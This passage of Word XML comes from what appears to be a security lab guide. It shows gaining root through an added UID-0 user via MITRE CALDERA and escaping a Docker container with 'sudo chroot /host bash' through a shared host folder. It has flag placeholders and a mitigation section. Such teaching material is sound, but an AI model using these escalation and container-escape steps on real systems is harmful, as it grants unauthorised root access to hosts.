                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="919480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB50204" w14:textId="77777777" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246"/>
    <w:p w14:paraId="004A3D6D" w14:textId="08AFEC9E" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Navigate over to the target machine terminal and run the following command to check for changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377C0C4" w14:textId="77777777" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246"/>
    <w:p w14:paraId="3DEEE032" w14:textId="7F9728E2" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60247ACE" w14:textId="77777777" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246"/>
    <w:p w14:paraId="6ABD619C" w14:textId="3D7ACB85" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r>
        <w:t>Notice that a new user Butter has been added with UID 0 and GID 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34336F61" w14:textId="20A97549" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r w:rsidRPr="0042306B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="200546B7" wp14:editId="0484AFEF">
            <wp:extent cx="5276215" cy="3155315"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
            <wp:docPr id="1799537590" name="Picture 1" descr="A screenshot of a computer scree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99537590" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="3155315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41579AA7" w14:textId="73739B4D" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r>
        <w:t>Run the following command to log into the new user butter. The password is the previously set “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>BetterWithButter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6A317F8A" w14:textId="77777777" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246"/>
    <w:p w14:paraId="797401B0" w14:textId="785B57BE" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> butter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568458BC" w14:textId="19F75F78" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246"/>
    <w:p w14:paraId="6D069A9C" w14:textId="219CAA56" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r>
        <w:t>Then check your privilege with the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A53534" w14:textId="77777777" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246"/>
    <w:p w14:paraId="5900F4D5" w14:textId="48790746" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27B95E65" w14:textId="21FDDA78" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E40BCA" w14:textId="7E3173F8" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r w:rsidRPr="0042306B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A3ADF17" wp14:editId="4F8D41B5">
            <wp:extent cx="3029373" cy="971686"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="491250458" name="Picture 1" descr="A screen shot of a computer cod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91250458" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3029373" cy="971686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA85F7" w14:textId="77919C6F" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r>
        <w:t xml:space="preserve">Congratulations, you have successfully gained root access with MITRE CALDERA, wasn’t too hard was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it?.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5983D588" w14:textId="77777777" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="0042306B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC4C831" w14:textId="77777777" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="0042306B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F194E4A" w14:textId="0A6294FD" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="0042306B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Retrieve the flag in /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4DA5356F" w14:textId="01577E6B" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Insert flag </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>here</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="13D95D25" w14:textId="77777777" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535063A1" w14:textId="77777777" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1468DA3C" w14:textId="77777777" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B251C08" w14:textId="691F81CD" w:rsidR="00DB7380" w:rsidRPr="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BONUS CHALLENGE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10C33D" w14:textId="6C44133A" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For this next part, we will explore how to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>breakout</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of this docker container and into the host machine that is running the container, this is equivalent to breaking out of a website to access the server itself. </w:t>
      </w:r>
      <w:r w:rsidR="007A40C5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>First, exit back into the user bob as even bob can do it!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB7FEE" w14:textId="111203D9" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24591708" w14:textId="77777777" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDA68FD" w14:textId="627D4DA5" w:rsidR="00DB7380" w:rsidRPr="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls -la /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590AF638" w14:textId="77777777" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246686AE" w14:textId="15CFA52C" w:rsidR="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We see a lot of directories but one that interests us is the directory ‘host</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> upon further inspection, we can assume that this is a shared folder from the host machine to share files with the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2806305A" w14:textId="1079AAF7" w:rsidR="00DB7380" w:rsidRPr="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E90508">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A07709" wp14:editId="75035BAC">
            <wp:extent cx="4210638" cy="3801005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1875088630" name="Picture 1" descr="A screenshot of a computer pr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75088630" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4210638" cy="3801005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AE6038" w14:textId="76BE55A3" w:rsidR="00DB7380" w:rsidRPr="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A40C5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges, we can run the command “chroot” on the folder and put us in through a bash interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9E7945" w14:textId="77777777" w:rsidR="007A40C5" w:rsidRDefault="007A40C5" w:rsidP="00DB7380">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653EE1A6" w14:textId="0B143F39" w:rsidR="007A40C5" w:rsidRDefault="007A40C5" w:rsidP="00DB7380">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chroot /host bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C98586" w14:textId="77777777" w:rsidR="007A40C5" w:rsidRDefault="007A40C5" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F908767" w14:textId="79E6F946" w:rsidR="00DB7380" w:rsidRPr="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">And just like that, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We Have successfully broken out of the container due to a shared host folder that the user has forgotten to remove after he is done.</w:t>
      </w:r>
      <w:r w:rsidR="007A40C5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This shows how badly misconfiguration can affect your system as even a low privilege user can do so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A739CF" w14:textId="77777777" w:rsidR="00DB7380" w:rsidRPr="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4861874D" w14:textId="77777777" w:rsidR="00DB7380" w:rsidRPr="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Navigate to /root/Documents to retrieve the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495423AA" w14:textId="7A9970F8" w:rsidR="00DB7380" w:rsidRPr="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Insert flag </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DB7380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>here</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A3ADE6A" w14:textId="77777777" w:rsidR="00DB7380" w:rsidRPr="00DB7380" w:rsidRDefault="00DB7380" w:rsidP="00DB7380">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA0E787" w14:textId="32C2FA41" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00660FF6">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF23C7" w14:textId="6AE4BE02" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00960233">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Once you are done with the lab,</w:t>
      </w:r>
      <w:r w:rsidR="00660FF6">
        <w:t xml:space="preserve"> On TARGET-MACHINE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> close the entire Terminal application and relaunch a new one. Type in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00660FF6">
        <w:t>Ctl+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00660FF6">
        <w:t xml:space="preserve"> to kill the docker container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2782C18C" w14:textId="1E0AF1FC" w:rsidR="00660FF6" w:rsidRPr="00E356BC" w:rsidRDefault="00660FF6" w:rsidP="00960233">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00660FF6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24F20A65" wp14:editId="748580DB">
            <wp:extent cx="4220164" cy="1333686"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="659342660" name="Picture 1" descr="A screen shot of a computer cod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59342660" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4220164" cy="1333686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4DD2C0" w14:textId="77777777" w:rsidR="00E90BDE" w:rsidRPr="00D06081" w:rsidRDefault="00E90BDE" w:rsidP="00E90BDE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C57EE21" w14:textId="77777777" w:rsidR="00D06081" w:rsidRDefault="00D06081" w:rsidP="00E90BDE">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:line="18pt" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A864894" w14:textId="77777777" w:rsidR="00FD4861" w:rsidRDefault="00FD4861" w:rsidP="00FD4861"/>
    <w:p w14:paraId="0A24ABF9" w14:textId="77777777" w:rsidR="00FD4861" w:rsidRDefault="00FD4861" w:rsidP="00FD4861"/>
    <w:p w14:paraId="07F94F70" w14:textId="18D69B62" w:rsidR="00FD4861" w:rsidRPr="009A4714" w:rsidRDefault="00FD4861" w:rsidP="00FD4861">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A4714">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:r w:rsidR="009A4714" w:rsidRPr="009A4714">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2FD213" w14:textId="77777777" w:rsidR="009A4714" w:rsidRDefault="009A4714" w:rsidP="00FD4861"/>
    <w:p w14:paraId="0AF246AF" w14:textId="6B3D9E13" w:rsidR="009A4714" w:rsidRDefault="009A4714" w:rsidP="00FD4861">
      <w:r>
        <w:t xml:space="preserve">Part 1: Ensure that only users who need to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file. This will ensure that low-privilege users will not be able to run unauthorized commands. In this case, remove bob from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E5EC98" w14:textId="77777777" w:rsidR="009A4714" w:rsidRDefault="009A4714" w:rsidP="00FD4861"/>
    <w:p w14:paraId="7163B1B6" w14:textId="30DC221C" w:rsidR="009A4714" w:rsidRPr="00FD4861" w:rsidRDefault="009A4714" w:rsidP="00FD4861">
      <w:r>
        <w:t xml:space="preserve">Part 2: Ensure that after you are done with the docker container, remove any shared folders as they </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>open up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a vulnerability for container users to exploit to gain access to your host machine.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009A4714" w:rsidRPr="00FD4861">
      <w:headerReference w:type="default" r:id="rId24"/>
      <w:footerReference w:type="default" r:id="rId25"/>
      <w:pgSz w:w="595.45pt" w:h="841.70pt" w:code="9"/>
      <w:pgMar w:top="57.60pt" w:right="90pt" w:bottom="57.60pt" w:left="90pt" w:header="36pt" w:footer="36pt" w:gutter="0pt"/>
      <w:cols w:space="36pt"/>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B61B283" w14:textId="77777777" w:rsidR="00C879E8" w:rsidRDefault="00C879E8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="535F6042" w14:textId="77777777" w:rsidR="00C879E8" w:rsidRDefault="00C879E8">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Symbol">
    <w:panose1 w:val="05050102010706020507"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000000" w:usb1="10000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000"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mbria">
    <w:panose1 w:val="02040503050406030204"/>
    <w:charset w:characterSet="iso-8859-1"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00006FF" w:usb1="420024FF" w:usb2="02000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Arial Unicode MS">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:characterSet="shift_jis"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000000" w:usb1="E9DFFFFF" w:usb2="0000003F" w:usb3="00000000" w:csb0="003F01FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:characterSet="iso-8859-1"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="SimSun">
    <w:altName w:val="宋体"/>
